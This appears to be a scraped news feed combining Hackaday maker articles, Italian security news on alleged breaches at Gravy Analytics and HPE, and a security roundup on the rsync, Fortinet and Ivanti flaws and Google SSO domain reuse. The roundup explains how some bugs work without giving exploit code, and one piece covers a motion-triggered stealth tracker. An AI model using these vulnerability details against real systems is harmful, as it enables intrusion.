For this project, [StonedEdge], [GinKage], and [notime2d8] set out to create a powerful enough handheld that could emulate games spanning the PlayStation 2, GameCube, and 3DS eras. Using a Radxa Rk3588s compute module as a base, the build navigates the design and construction of things like the carrier board, custom controllers, and the enclosure.
There are experiments with the MIPI OLED displays and the final revision uses an RP2040 as an HID to read button presses and data from the IMU. WiFi 6 and BLE 5.2 are handled by an M2 slot-mounted module that is interfaced using a PCI Express bus which is always tricky when designing your PCBs. The final product looks great and there are a couple of videos that show the device in action. Additionally, the design files and code are available for anyone who fancies building one themselves.
If you like handheld gaming consoles, then have a look at the Intel NUC based Handheld with Steam Deck vibes.
youtube.com/embed/lf8C4oy6nv0?…
Motorized Coil Tunes Your Ham Antenna on a Budget
When it comes to amateur radio, one size definitely does not fit all. That’s especially true with antennas, which need to be just the right size for the band you’re working, lest Very Bad Things happen to your expensive radio. That presents a problem for the ham who wants the option to work whichever band is active, and doubly so if portable operation is desired.
Of course, there are commercial solutions to this problem, but they tend to be expensive. Luckily [Øystein (LB8IJ)] seems to have found a way around that with this low-cost homebrew motorized antenna coil, which is compatible with the Yaesu Automatic Tuning Antenna System. ATAS is supported by several Yaesu transceivers, including the FT-891 which [Øystein] favors for field operations. ATAS sends signals up the feedline to a compatible antenna, which then moves a wiper along a coil to change the electrical length of the antenna, allowing it to resonate on the radio’s current frequency.
The video below details [Øystein]’s implementation of an ATAS-compatible tuning coil, mainly focusing on the mechanical and electrical aspects of the coil itself, which takes up most of the room inside a 50-mm diameter PVC tube. The bore of the air-core coil has a channel that guides a wiper, which moves along the length of the coil thanks to a motor-driven lead screw. [Øystein] put a lot of work into the wiper, to make it both mechanically and electrically robust. He also provides limit switches to make sure the mechanism isn’t over-driven.
There’s not much detail yet on how the control signals are detected, but a future video on that subject is promised. We’re looking forward to that, but in the meantime, the second video below shows [Øystein] using the tuner in the field, with great results.
youtube.com/embed/skmWhgQLtnM?…
youtube.com/embed/MKAW8y2GVl8?…
Dati di Geolocalizzazione: Gli Hacker Vogliono Pubblicare Il Bottino di Gravy Analytics
Gli hacker hanno annunciato che Gravy Analytics, una società che vende dati sulla posizione degli smartphone al governo degli Stati Uniti, è stata hackerata. Gli aggressori avrebbero avuto accesso a una grande quantità di dati, tra cui elenchi di clienti, informazioni sul settore e geodati precisi degli utenti. Gli hacker minacciano di pubblicare informazioni se l’azienda non risponde entro 24 ore.
L’incidente è stato un serio avvertimento per l’intero settore del commercio di dati di geolocalizzazione. Per anni, le aziende hanno raccolto dati sulla posizione tramite app mobili e reti pubblicitarie per poi venderli ad aziende private e agenzie governative. Tra i clienti figurano il Dipartimento della Difesa degli Stati Uniti, il Dipartimento per la Sicurezza Nazionale, l’Internal Revenue Service e l’FBI. Tuttavia, tali dati diventano un obiettivo attraente per i criminali informatici.
Sui forum, gli hacker hanno pubblicato campioni di dati che includevano le coordinate esatte degli utenti, i tempi di viaggio e ulteriori qualificatori, come “probabilmente alla guida”. Tra i dati sono state trovate informazioni su utenti di diversi paesi, tra cui Russia, Messico e Paesi Bassi. Alcuni dati sono già stati utilizzati dalle agenzie statunitensi per le operazioni di migrazione.
Gli hacker affermano di aver ottenuto l’accesso all’infrastruttura Gravy Analytics nel 2018. Gli screenshot mostrano l’accesso completo ai server, ai domini e allo spazio di archiviazione Amazon S3 dell’azienda. Si dice che anche i server hackerati eseguano Ubuntu, evidenziando la portata della violazione.
Sito web di un’azienda hackerata e screenshot degli hacker (404 Media)
Nel 2023, Gravy Analytics è stata acquisita da Unacast, ma il sito web dell’azienda rimane inaccessibile. I rappresentanti di Unacast non hanno fornito commenti sulla situazione.
I clienti di Gravy Analytics (la società madre di Venntel) includono Apple, Uber, Comcast, Equifax e appaltatori del governo statunitense come Babel Street. Quest’ultimo ha precedentemente utilizzato i dati per strumenti di tracciamento, compreso il monitoraggio dei visitatori delle cliniche per aborti.
In precedenza, la Federal Trade Commission (FTC) degli Stati Uniti aveva avviato un’indagine contro Gravy Analytics e Venntel. Le società sono state accusate di aver venduto dati riservati senza il consenso dell’utente e hanno ordinato di cancellare i dati storici di geolocalizzazione. La FTC ha affermato che le azioni delle società violano una legge che vieta l’uso ingiusto delle informazioni personali.
In precedenza si era saputo che le basi militari americane in Europa erano minacciate a causa della fuga di dati sulla posizione raccolti per la pubblicità mirata. Dall’indagine è emerso che le aziende statunitensi che raccolgono legalmente dati a scopo pubblicitario offrono in realtà la possibilità di tracciare i movimenti del personale militare e dei servizi segreti.
L'articolo Dati di Geolocalizzazione: Gli Hacker Vogliono Pubblicare Il Bottino di Gravy Analytics proviene da il blog della sicurezza informatica.
A Look Inside a Modern Mixed Signal Oscilloscope
High-speed bench equipment has become so much more affordable in the last decade that naturally one wonders what has made that possible. A great source of answers is a teardown by users like [kerry wong] who are kind enough to take apart their MSO2304X 300MHz osilloscope for our viewing pleasure.
The posted teardown video shows the guts of the scope without enclosure, heatsinks and shields that reveal a handful of boards that execute the functions nicely. The motherboard uses the Xilinx KINTEX-7 FPGA that is expected to run core processes such as signal processing as well as managing the sample storage on the paired DDR3 memory.
The analog front-end here is a bit of a surprise as it sports TI’s ADC08D1000 ADCs that are capable of 1.3 GSPS but the scope is advertised to be capable of more. The inferred design is that all four ADCs are being operated in an interleaved symphony to achieve 5 GSPS. Testing confirms that each input uses two ADCs at a time and when two or more channels are employed, the reconstruction quality drops.
The input lanes are pretty standard and are equipped with amps and power regulators that are more than up to the task. More TI chips are discovered such as the DAC128S085 that are the key to the analog waveform generator which is a feature commonly found in modern high-end oscilloscopes. On the application processor side, the scope has a Rockchip RK3568 that is responsible for the GUI and other user-level functions.
An interesting point in the video was how lean the construction is as well as the cost. The FPGA, ADCs, and other analog components are estimated to total the sale price of the scope, which means that manufacturer pricing would have to be heavily discounted to grant gross margin on sales. We loved the review of the scope and is the other part of the story.
youtube.com/embed/rY8mqdbomXA?…
Stealth AirTag Broadcasts When Moved: an Experiment
A simple yet intriguing idea is worth sharing, even if it wasn’t a flawless success: it can inspire others. [Richard]’s experiment with a motion-powered AirTag fits this bill. Starting with our call for simple projects, [Richard] came up with a circuit that selectively powers an AirTag based on movement. His concept was to use an inertial measurement unit (IMU) and a microcontroller to switch the AirTag on only when it’s on the move, creating a stealthy and battery-efficient tracker.
The setup is minimal: an ESP32 microcontroller, an MPU-6050 IMU, a transistor, and some breadboard magic. [Richard] demonstrates the concept using a clone AirTag due to concerns about soldering leads onto a genuine one. The breadboard-powered clone chirps to life when movement is detected, but that’s where challenges arise. For one, Apple AirTags are notoriously picky about batteries—a lesson learned when Duracell’s bitter coating blocks functionality. And while the prototype works initially, an unfortunate soldering mishap sadly sends the experiment off the rails.
Despite the setbacks, this project may spark a discussion on the possibilities of DIY digital camouflage for Bluetooth trackers. By powering up only when needed, such a device avoids constant broadcasting, making it harder to detect or block. Whether for tracking stolen vehicles or low-profile uses, it’s a concept rich with potential. We talked about this back in 2022, and there’s an interesting 38C3 talk that sheds quite some light on the broadcasting protocols and standards.
youtube.com/embed/WpcrsezGGOM?…
Header AirTag: Apple, Public domain, via Wikimedia Commons
I3C Bit-banging Fun for the RP2040
The RP2040 has quickly become a hot favorite with tinkerers and makers since its release in early 2021. This is largely attributed to the low cost, fast GPIOs, and plethora of bus peripherals. [xyphro] has written the I3C Blaster firmware that helps turn the Raspberry Pi Pico into a USB to I3C converter.
The firmware is essentially a bit-bang wrapper and exposes an interactive shell with a generous command set. But it is a lot more than that. [xyphro] has taken the time to dive into the I3C implementation standard and the code is a fairly complex state-machine that is a story on its own.
[xyphro] provides a Python script in case you feel like automating things or drawing up your GUI. And finally, if you are feeling adventurous, the I3C implementation is available for your project tinkering needs.
We loved the fact there is a branch project that lets you extend a Saleae Logic Analyzer to decode I3C and associated protocols by adding a Pico on the cheap. The last update to the project log shows the addition of a MIPI I3C High Data Rate Mode which operates at 25 Mbps which is right up the RP2040s.
[xyphro] gave us the Home Brew Version Of Smart Tweezers a decade ago and we expect there is more to come. If you are interested in reading more about the I3C bus, have a look at I3C — No Typo — Wants To Be Your Serial Bus.
Investigating USB-to-Ethernet Dongles With “Malware” Claims
Recently a video surfaced from someone claiming that certain USB-to-Ethernet dongles contained ‘malware’ among other big claims. Basically these dongles were said to be designed by China (and Russia) to spy on users and so on, but how much of this is actually grounded in reality? When [lcamtuf] dove into the topic, what he found was not so much a smoking gun, but rather a curious relic from the era when drivers-on-CD were being phased out.
The item that the video went bananas about was namely an additional SPI Flash chip on the PCB alongside the USB 2.0 – Ethernet IC, with many conspiracy theories being floated as to what it would be used for. After some digging, [lcamtuf] found that the IC used in these dongles (SR9900) is by a company called CoreChips Shenzhen, with a strong suggestions that it is a clone of the (2013-era) Realtek RTL8152B.
Both chips have an external SPI Flash option, which is used with the USB side to present a ‘virtual CD drive’ to the user when the dongle is plugged in. This was borne out with the SR9900 Windows system mass production tool that [lcamtuf] obtained a copy of. Included with the flashing tool is a 168 kB ISO image (containing the SR9900 driver package) which happily fits on the 512 kB Flash chip.
Although it’s always possible for chips and firmware to contain backdoors and malware, in this particular case it would appear to be that it’s merely a cruel reminder that 2013 is now already vanishing into the realm of ‘retro computing’ as us old fogies cling to our driver installation floppies and CDs.
Putting Cheap Motorcycle Tachometers to Work
With so much data being thrown at our eyeballs these days, it’s worryingly easy for the actually important stuff to slip by occasionally. So when [Liam Jackson] wanted a way to visualize the number of test failures popping up in the continuous integration system at work, he went with a novel but effective solution — universal motorcycle tachometers.
It turns out these little gauges can be had for under $10 a piece from the usual overseas retailers, and are very easy to drive with a microcontroller. As [Liam] explains, all you need to do other than providing them with 12 volts, is feed them a PWM signal. Even though the gauges are designed for a 12 V system, they apparently don’t have any problem responding to the 5 V logic level from the Arduino’s pins.
For his particular application, [Liam] put three of the gauges together to create a very handsome dashboard. If you want to recreate his setup exactly he’s made the STLs available for the gauge cluster housing. Note the small OLED at the center, this offers a way to show a bit more context than the three analog gauges alone can express, especially if you’ve got an application where you might be switching between multiple data sources.
Over the years we’ve seen several projects that repurposed analog gauges of various types, often for showing computer performance, but they generally involved having to drive the galvanometers directly. That these tachometers can simply be fed a simple digital signal should make implementing them into your project much easier.
Learn New Tools, or Hone Your Skill with the Old?
Buried in a talk on AI from an artist who is doing cutting-edge video work was the following nugget that entirely sums up the zeitgeist: “The tools are changing so fast that artists can’t keep up with them, let alone master them, before everyone is on to the next.” And while you might think that this concern is only relevant to those who have to stay on the crest of the hype wave, the deeper question resounds with every hacker.
When was the last time you changed PCB layout software or refreshed your operating system? What other tools do you use in your work or your extra-curricular projects, and how long have you been using them? Are you still designing your analog front-ends with LM358s, or have you looked around to see that technology has moved on since the 1970s? “OMG, you’re still using ST32F103s?”
It’s not a simple question, and there are no good answers. Proficiency with a tool, like for instance the audio editor with which I crank out the podcast every week, only comes through practice. And practice simply takes time and effort. When you put your time in on a tool, it really is an investment in that it helps you get better. But what about that newer, better tool out there?
Some of the reluctance to update is certainly sunk-cost fallacy, after all you put so much sweat and tears into the current tool, but there is also a real cost to overcome to learn the new hotness, and that’s no fallacy. If you’re always trying to learn a new way of doing something, you’re never going to get good at doing something, and that’s the lament of our artist friend. Honing your craft requires focus. You won’t know the odd feature set of that next microcontroller as well as you do the old faithful – without sitting down and reading the datasheet and doing a couple finger-stretching projects first.
Striking the optimal balance here is hard. On a per-project basis, staying with your good old tool or swapping to the new hotness is a binary choice, but across your projects, you can do some of each. Maybe it makes sense to budget some of your hacking time into learning new tools? How about ten percent? What do you think?
This article is part of the Hackaday.com newsletter, delivered every seven days for each of the last 200+ weeks. It also includes our favorite articles from the last seven days that you can see on the web version of the newsletter. Want this type of article to hit your inbox every Friday morning? You should sign up!
JTAG & SWD Debugging on the Pi Pico
[Surya Chilukuri] writes in to share JTAGprobe — a fork of the official Raspberry Pi debugprobe firmware that lets you use the low-cost microcontroller development board for JTAG and SWD debugging just by flashing the provided firmware image.
We’ve seen similar projects in the past, but they’ve required some additional code running on the computer to bridge the gap between the Pico and your debugging software of choice. But [Surya] says this project works out of the box with common tools such as OpenOCD and pyOCD.
As we’ve cautioned previously, remember that the Pi Pico is only a 3.3 V device. JTAG and SWD don’t have set voltages, so in the wild you could run into logic levels from 1.2 V all the way to 5.5 V. While being able to use a bare Pico as a debugger is a neat trick, adding in a level shifter would be a wise precaution.
Looking to get even more use out of those Pi Picos you’ve got in the parts bin? How about using it to sniff USB?
A PDA From An ESP32
The ESP32 series of microcontrollers have been with us for quite a few years now and appeared in both Tensilica and RISC-V variants, both of which deliver an inexpensive and powerful device. It’s thus shown up in quite a few handheld computers, whether they be conference badges or standalone devices, and this is definitely a field in which these chips have more to give. We’re pleased then to see this e-ink PDA from [ashtf8], which we think raises the bar on this type of device.
At its heart is an ESP32-S3, on the back side of a QWERTY keyboard PCB, and for a display it has an e-ink screen. To get over the annoying e-ink refresh when typing text it uses a hybrid of e-ink and OLED, with a small OLED holding the current line which can be periodically sent to the e-ink. Perhaps the nicest thing about the hardware though is the clear resin printed clamshell case, and a hand-cast silicone membrane for the keyboard. That has always been a part considered difficult to produce, and here he is making one from scratch. Take a look at the video below the break.
Software-wise it has a range of apps with more promised, but even as it stands it looks useful enough to work with. If that’s not enough, then perhaps an ESP32 operating system would help.
youtube.com/embed/308KoLSLlCc?…
HPE nel mirino: IntelBroker Pubblica una massiccia violazione. Bluff sul Dark Web?
Il panorama della cybersecurity è stato nuovamente scosso da IntelBroker, noto Threat Actor, che ha rivendicato una presunta violazione significativa ai danni di Hewlett Packard Enterprise (HPE).
Secondo quanto dichiarato su un forum nel Dark Web, l’attacco avrebbe esposto dati sensibili interni, tra cui codice sorgente, certificati e credenziali API. Sebbene i dettagli non siano ancora stati confermati ufficialmente, l’evento ha acceso un dibattito su possibili rischi e vulnerabilità per uno dei colossi dell’IT.
Al momento, non possiamo confermare la veridicità della notizia, poiché l’organizzazione non ha ancora rilasciato alcun comunicato stampa ufficiale sul proprio sito web riguardo l’incidente. Pertanto, questo articolo deve essere considerato come ‘fonte di intelligence’.
Le presunte prove del compromesso
IntelBroker non si è limitato a rivendicare la violazione, ma ha fornito dettagli per supportare le sue affermazioni. Tuttavia, è lecito chiedersi: le prove condivise sono davvero sufficienti per confermare un attacco di questa portata?
A supporto di queste dichiarazioni, IntelBroker avrebbe condiviso screenshot di sistemi interni (ora non più disponibili), endpoint API e documentazione tecnica, aumentando la credibilità delle sue affermazioni.
Le implicazioni di una possibile violazione
Se confermate, le conseguenze di questo attacco potrebbero essere devastanti per HPE. Ecco i principali rischi evidenziati:
- Abuso di credenziali: Le credenziali esposte potrebbero essere utilizzate per accedere a piattaforme integrate come Salesforce, causando ulteriori violazioni o manipolazioni di sistema.
- Manipolazione dei servizi: Conoscere dettagli operativi come tempi di esecuzione e frequenze di log potrebbe permettere agli attaccanti di alterare le prestazioni dei sistemi o coprire le loro tracce.
- Campagne di phishing mirate: Gli indirizzi email e i nomi associati potrebbero essere sfruttati per ingegneria sociale e campagne di phishing contro dipendenti e partner HPE.
- Danno reputazionale: Oltre ai rischi tecnici, la fiducia di clienti e partner potrebbe essere gravemente compromessa.
Chi è IntelBroker?
IntelBroker si è distinto negli ultimi anni per attacchi mirati contro grandi imprese, sfruttando vulnerabilità nei sistemi interni per massimizzare l’impatto delle sue operazioni. In questa presunta violazione, l’attore ha dimostrato un livello di sofisticazione elevato, mirato non solo all’esfiltrazione di dati, ma anche alla raccolta di informazioni critiche sui sistemi e le operazioni di HPE. Questo attacco, se confermato, rappresenterebbe una delle operazioni più significative attribuite a IntelBroker.
Come dovrebbe rispondere HPE?
HPE, di fronte a queste accuse, deve agire rapidamente per contenere i danni e rafforzare la propria sicurezza. Tra le azioni consigliate:
- Gestione immediata dell’incidente: Bloccare l’accesso residuo e valutare l’ampiezza della violazione.
- Rotazione delle credenziali: Revocare e rigenerare tutte le chiavi API, i certificati e le credenziali compromesse.
- Audit di sicurezza approfondito: Analizzare i controlli nei repository, nei sistemi di sviluppo e nelle integrazioni API.
- Comunicazione ai clienti: Informare tempestivamente i clienti coinvolti e fornire supporto per mitigare i rischi.
- Monitoraggio delle minacce: Sorvegliare i forum nel Dark Web per individuare ulteriori pubblicazioni o transazioni relative ai dati sottratti.
Conclusione
Questa vicenda, anche se ancora in attesa di conferme definitive, mette in evidenza la necessità di un approccio proattivo alla sicurezza informatica. IntelBroker, con le sue azioni, non solo sottolinea le vulnerabilità di grandi organizzazioni come HPE, ma solleva anche dubbi fondamentali:
- Questo è un caso isolato o solo il primo di una serie di attacchi più complessi?
- Stiamo facendo abbastanza per proteggere le infrastrutture critiche?
- Come possiamo migliorare il monitoraggio delle minacce emergenti?
Come nostra consuetudine, lasciamo sempre spazio ad una dichiarazione da parte dell’azienda qualora voglia darci degli aggiornamenti sulla vicenda. Saremo lieti di pubblicare tali informazioni con uno specifico articolo dando risalto alla questione.
RHC monitorerà l’evoluzione della vicenda in modo da pubblicare ulteriori news sul blog, qualora ci fossero novità sostanziali. Qualora ci siano persone informate sui fatti che volessero fornire informazioni in modo anonimo possono utilizzare la mail crittografata del whistleblower.
L'articolo HPE nel mirino: IntelBroker Pubblica una massiccia violazione. Bluff sul Dark Web? proviene da il blog della sicurezza informatica.
A Field Expedient Welder Only MacGyver Could Love
If you needed to weld something in a pinch, what’s the minimum complement of equipment you could get away with? In [Professor Bardal]’s case, it’s a couple of motorcycle batteries and a roll of flux-core wire, and not much else.
We suspect this one is going to elicit quite a few comments, not least by the welding fans who no doubt will be triggered by just about everything in the video below, especially by characterizing this as MIG welding; it’s FCAW, or flux-core arc welding. But it bears some superficial similarities to MIG, at least insofar as there’s a consumable wire electrode through which a high-current DC supply flows, creating enough heat to melt it and the base metal. In this case, the current is provided by a pair of 12-volt motorcycle batteries hooked together in series. There’s also a torch of sorts — a short length of copper capillary tubing with a 1-mm inside diameter clamped in the jaws of a stick welder stinger, or a pair of locking pliers if you’re really in a pinch. The torch is connected to the negative terminal on the battery with a jumper cable, and the positive terminal is connected to the workpiece.
To create the weld, a piece of 0.8-mm flux-core welding wire is threaded through the capillary and into the joint, and fed by hand as it’s consumed. It’s awkward and awful, but it works. Of course, there’s no control over amperage as there would be with a legit welding machine, which would make it hard to adapt this method to different materials. Weld quality appears poor, too. But we suspect that if you were in a position to need a welder like this, you wouldn’t really care about any of that.
Fabricobbled welding rigs seem to be [Professor Bardal]’s thing — witness this much more professional MIG welder, complete with a baking soda and vinegar shielding gas generator.
youtube.com/embed/Z3cc_ph1Wv4?…
Thanks to [Danjovic] for the tip.
No Crystal Earpiece? No Problem!
A staple of starting off in electronics ion years past was the crystal set radio, an extremely simple AM radio receiver with little more than a tuned circuit and a point contact diode as its components. Point contact diodes have become difficult to find but can be replaced with a cats whisker type detector, but what about listening to the resulting audio? These circuits require a very high impedance headphone, which was often supplied by a piezoelectric crystal earpiece. [Tsbrownie] takes a moment to build a replacement for this increasingly hard to find part.
It shouldn’t have come as a surprise, but we were still slightly taken aback to discover that inside these earpieces lies the ubiquitous piezoelectric buzzer element. Thus given a 3D-printed shell to replace the one on the original, it’s a relatively simple task to twist up a set of wires and solder them on. The result is given a test, and found to perform just as well as the real thing, in fact a little louder.
In one sense this is such a simple job, but in another it opens up something non-obvious for anyone who needs a high impedance earpiece. The days of the crystal radios and rudimentary transistor hearing aids these parts were once the main target for may both have passed, but just in case there’s any need for one elsewhere, now we can fill it. Take a look at the video, below the break.
Fancy trying a crystal radio? We’ve got you covered.
youtube.com/embed/ARtfLB0nQ5k?…
Trinteract Mini Space Mouse Does It In 3D
We’re not sure how we managed to miss this one, but better late than never, right? This is Trinteract, a 3-DOF input device that’s both open-source and Arduino compatible. There’s even a neat 3D-printed clip to add it to the side of your laptop.
Imagine navigating 2D and 3D environments, or flying around in Minecraft with ease. [Görkem]’s custom PCB features a Hall effect sensor which picks up readings from the magnet embedded in the bottom of the joystick. You can use any magnetic object as input. In the video below the break, [Görkem] shows a 3D-printed sphere with a disc magnet trapped inside as an alternative. The super-neat part is that the thing moves around entirely on flexures. You know how much we love flexures around here.
[Görkem] has written up a fantastic guide for those who must have one of their own. As a bonus, the guide details the background and thought process behind the design, which we love to see.
Don’t like magnets? This space mouse uses an accelerometer and a spring.
youtube.com/embed/YoGgdORVARs?…
Thanks for the tip, [James]!
Android Head Unit Gets Volume Knob Upgrade
Touch screen head units are pretty much the norm these days. Many compromise with annoying on-screen volume controls or tiny buttons. If you find yourself with such a unit, you might like to hack in a real volume knob. [Daniel Ross] shows us how to do just that.
The build uses an ATMega328 as the heart of the operation, though [Daniel] notes an Arduino Uno or Mini would have done just fine. It’s set up with a 74HC14 hex Schmitt trigger, and a CD4066 quad bilateral switch on a custom PCB. As for the volume knob itself, it’s not a real analog pot, instead it’s using a rotary encoder with a center push button. The way it works is that the Arduino reads the encoder, and figures out whether you’re trying to turn the volume up or down based on the direction you’re turning it. It then sends commands to the CD4066 to switch resistors in and out of circuit with lines going to the stereo to emulate the action of volume buttons on the steering wheel.
[Daniel’s] guide explains how everything works in greater detail, and how you can calibrate your head unit to accept these signals while preserving the function of your actual steering wheel volume buttons. Then you just have to find a neat way to integrate the knob into your existing dashboard.
We don’t see as many car stereo hacks in this era when infotainment systems rule all, but we’ve seen some great stuff from older vehicles over the years. Video after the break.
youtube.com/embed/dR6vM4ohU5A?…
New Bambu Lab Firmware Update Adds Mandatory Authorization Control System
As per a recent Bambu Lab blog post, its FDM printers in the X1 series will soon receive a firmware update that adds mandatory authentication for certain operations, starting with the firmware update on January 23rd for the aforementioned FDM printers. These operations include performing firmware upgrades, initiating a print job (LAN or cloud), remote video access and adjusting parameters on the printer. Using the printer directly and starting prints from an SD card are not affected.
As reasoning for this new feature Bambu Lab points to recent exploits that gave strangers access to people’s printers, though cheekily linking to an article on an Anycubic printer exploit. While admittedly a concern, this mostly affects internet-exposed printers, such as those that are tied into a ‘cloud’ account. Even so, LAN-based printing also falls under this new mandatory authentication system, with Bambu Lab offering a new tool called Bambu Connect for those who insist on using non-Bambu Lab branded software like OrcaSlicer. This allows for exported G-code files to be sent to a (property authenticated) Bambu Lab printer.
For those who do not wish to use this feature, not upgrading the firmware is currently the only recourse. Although this firmware update is only for X1-series printers, Bambu Lab promised that it’ll arrive for their other printers too in due time. While Bambu Lab printer owners consider installing the alternative X1 Plus firmware, the peanut gallery can discuss the potential security issues (or lack thereof) of an open Fluidd or similar UI on their LAN-connected, Klipper-based FDM printers.
Thanks to [mip] for the tip.
Hackaday Podcast Episode 304: Glitching the RP2350, Sim Sim Sim, and a Scrunchie Clock
It’s podcast time again, and this week Dan sat down with Elliot for a look back at all the cool hacks we’ve written about. We started off talking about Hackaday Europe, which is coming up in March — seems unlikely that it’s just around the corner, but there it is. There’s also good news: the Hack Chat is back, and we started things off with a bang as Eben Upton stopped by to talk all things Pi. Separately, we talked about fault injection attacks, including how to find the hidden cup of 0xC0FFEE in an RP2350.
We saw a very cool piece of LED jewelry that does a fluid simulation, a direct conversion radio that’s all laid out in front of you, and the scrunchiest mechanical digital clock you’ll ever see. We saw blinkenlights for blinkenlights’ sake, all the ways to put threads in your prints, and how to ditch to coax and wire up your antennas with Cat 6 cable. Plus, it’s an Al Williams twofer in the Can’t-Miss Articles, with a look back at life before GPS and how you can tune into digital ham radio, no radio required.
html5-player.libsyn.com/embed/…
Where to Follow Hackaday Podcast
Places to follow Hackaday podcasts:
Download the zero-calorie MP3.
Episode 304 Show Notes:
News:
What’s that Sound?
- Congratulations to [Egon] for getting the Ross ice shelf, and not some sci-fi computer at all.
Interesting Hacks of the Week:
- All The Attacks On The RP2350
- A Direct Conversion Receiver Anyone Can Build
- Amateur Radio Homebrewing Hack Chat
- Make Your Own Variable Inductor
- DIY Tuning Capacitors From Washers And 3D-Printed Parts
- A Variable Capacitor For Not A Lot
- Fluid Simulation Pendant Teaches Lessons In Miniaturization
- Using The ESP8266 For Low-Cost Fault Injection
- Comparing Ways To Add Threads To Your 3D Prints
- Springs And Things Make For A Unique Timepiece
Quick Hacks:
- Elliot’s Picks
- Avian-Inspired Drones: How Studying Birds Of Prey Brings More Efficient Drones Closer
- Audio On A Shoestring: DIY Your Own Studio-Grade Mic
- Second CNC Machine Is Twice As Nice
- Dan’s Picks:
- Forget The Coax, Wire Up Your Antennas With Cat 6 Cable
- Procedurally Generated Terrain In OpenSCAD
- Blinkenlights-First Retrocomputer Design
Can’t-Miss Articles:
hackaday.com/2025/01/17/hackad…
You Can Build Your Own Hubless Roller Blades and Ride Off Road
Regular roller blades go way back, relying on a number of wheels mounted in a line and relying on regular bearings. [The Q] came up with an altogether more interesting design by handcrafting some tall skates with two hubless wheels apiece.
The build eliminates the hard work of creating the shoe part of the skates. Instead, an existing pair of roller blades was used, and modified to run the alternative hubless setup. The hubless wheels themselves were built by essentially wrapping a few large ball bearings with foam tires from an existing scooter wheel. The ball bearings have a large internal diameter, which creates the hubless look. They’re then mounted to a replacement steel frame that was mounted to the original skates.
Are there any benefits to hubless wheels in this application? Probably not, other than aesthetics. These skates are far heavier than before, and with poorer rolling resistance. However, we will note that the softer foam tires and large rolling diameter would probably offer some benefits on rougher surfaces. They even appear to work on hard-packed dirt, which is pretty impressive.
In any case, it’s always neat to see oddball designs that challenge our perception of what can and can’t be achieved on a mechanical level. These things don’t always have to make sense from an efficiency standpoint to be fun.
youtube.com/embed/M1pFmh8PQqY?…
This Week in Security: Rsync, SSO, and Pentesting Mushrooms
Up first, go check your machines for the rsync version, and your servers for an exposed rsync instance. While there are some security fixes for clients in release 3.4.0, the buffer overflow in the server-side rsync daemon is the definite standout. The disclosure text includes this bit of nightmare fuel: “an attacker only requires anonymous read access to a rsync server, such as a public mirror, to execute arbitrary code on the machine the server is running on.”
A naive search on Shodan shows a whopping 664,955 results for rsync servers on the Internet. Red Hat’s analysis gives us a bit more information. The checksum length is specified by the remote client, and an invalid length isn’t properly rejected by the server. The effect is that an attacker can write up to 48 bytes into the heap beyond the normal checksum buffer space. The particularly dangerous case is also the default: anonymous access for file retrieval. Red Hat has not identified a mitigation beyond blocking access.
If you run servers or forward ports, it’s time to look at ports 873 and 8873 for anything listening. And since that’s not the only problem fixed, it’s really just time to update to rsync 3.4.0 everywhere you can. While there aren’t any reports of this being exploited in the wild, it seems like attempts are inevitable. As rsync is sometimes used in embedded systems and shipped as part of appliances, this particular bug threatens to have quite the long tail.
My Gmail is My Passport, Verify Me
Here’s an interesting question. What happens to those “Log In With Google” accounts that we all have all over the Internet, when the domain changes hands? And no, we’re not talking about gmail.com. We’re talking about myfailedbusiness.biz, or any custom domain that has been integrated with a Google Workspace. The business fails, the domain reverts back to unclaimed, someone else purchases it, and re-adds the admin@myfailedbusiness.biz Google Workspace account. Surely that doesn’t register as the same account for the purpose of Google SSO, right?
The answer to this question is to look at what actually happens when a user uses Google Oauth to log in. The service sends a message to Google, asking Google to identify the user. Google asks the user for confirmation, and if granted will send an ID token to the service. That token contains three fields that are interesting for this purpose. The domain and email are straightforward, and importantly don’t make any distinction between the original and new users. So when the domain and email change hands, so does ownership of the token.
Oauth does provide a sub (subject) field, that is a unique token for a given user/service combination. Seems like that solves the issue, right? The problem is that while that identifier is guaranteed to be unique, it’s not guaranteed to be consistent, and thus isn’t widely used as a persistent user identifier. Google is aware of the issue, and while they initially closed it as a “Won’t fix” issue, the concept did eventually earn [Dylan Ayrey] a nifty $1337 bounty and a promise that Google is working on unspecified fixes. There is no immediate solution, and it’s not entirely clear that this is strictly a Google problem. Other SSO solutions may have the same quirk.
Fortigate Under Attack
Fortiguard has reported that a vulnerability in FortiOS and FortiProxy is under active exploitation. Fortiguard lists quite a few Indicators of Compromise (IoCs), but as far as the nature of the vulnerability, all we know is that it is an authentication bypass in an Node.js websocket module that allows a remote attacker to gain super-admin privileges. Yoiks.
Actic Wolf has more details on the exploit campaign, which was first found back in early December, but appears to have begun with widespread scanning for the vulnerability as early as November 16. Attackers moved slowly, with the goal of establishing VPN access into the networks protected behind the vulnerable devices. Arctic Wolf has provided additional IoCs, so time to go hunting.
Ivanti Connect, Too
There’s another security device under attack this week, as watchTowr labs has yet another fun romp through vendor mis-security. This time it’s a two-part series on Ivanti Connect Secure, and the two buffer overflows being used in the wild.
Ivanti has already released a patch, so the researchers ran a diff on the strings output for the patched and unpatched binary of interest. Three new error messages are in the new version, complaining about client data exceeding a size limit. The diaphora binary diffing tool found some interesting debbuging data, like Too late for IFT_PREAUTH_INIT. “IF-T” turns out to be an open VPN standard, and that term led to a statement about backwards compatibility in Ivanti code that had terrible “code smell”.
The IF-T protocol includes the optional clientCapabilities field, and Ivanti’s implementation used a fixed length buffer to store it when parsing incoming connections. The client code almost gets it right, using a strlen() check on the data, and strncpy() to ensure the right number of bytes are copied. Except both of those best-practices are completely useless when the result from strlen() is fed directly into strncpy() as the maximum byte count, without checking whether it overflows the buffer.
The second watchTowr article goes through the steps of turning the vulnerability into a real exploit, but doesn’t actually give away any exploit code. Which hasn’t really mattered, as Proof of Concepts (PoCs) are now available. The takeaway is that Ivanti still has security problems with their code, and this particular exploit is both fully known, and being used in the wild.
Pentesting Mushrooms
The folks at Silent Signal have an off-the-beaten-path write-up for us: How to get hired as a pentester. Or alternatively, the story of hacking Mushroom Inc. See, they built an intentionally vulnerable web application, and invited potential hires to find flaws. This application included cross-site scripting potential, SQL injection, and bad password handling, among other problems. The test was to take 72 hours, and find and document problems.
Part of the test was to present the findings, categorize each vulnerability’s severity, and even make recommendations for how the fictional business could roll out fixes. Along the way, we get insights on how to get your job application dismissed, and what they’re really looking for in a hire. Useful stuff.
Bits and Bytes
Secure Boot continues to be a bit of a problem. Microsoft signed a UEFI application that in turn doesn’t actually do any of the Secure Boot validation checks. This is only an issue after an attacker has admin access to a machine, but it does completely defeat the point of Secure Boot. Microsoft is finally rolling out fixes, revoking the signature on the application.
